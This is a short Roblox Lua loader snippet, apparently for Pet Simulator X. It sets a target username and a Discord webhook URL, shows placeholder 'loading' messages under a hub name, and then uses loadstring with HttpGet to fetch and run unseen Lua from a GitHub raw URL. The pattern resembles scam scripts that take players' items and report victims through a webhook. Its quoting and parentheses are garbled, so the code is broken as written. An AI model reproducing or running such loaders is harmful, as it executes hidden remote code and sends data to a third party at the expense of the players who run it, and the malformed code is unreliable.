loadstring(game:HttpGet('Username = "GHALA7353"

WebHook = "https://discord.com/api/webhooks/1072183009740079284/RPEJ8y5cv3GLlYe27cVMD2pg_1pVsTPbsFqZZWZJTFxZIVzdVc2BD1QcW9RRJ-Lt1erG"

_G.CustomScriptName = "Shit_Hub"

_G.Text1 = "Script Loaded..."

_G.Text2 = "Waiting for Script"

_G.Text3 = "Checking Scripts..."

_G.Text4 = "Starting Scripts..."

loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()))()
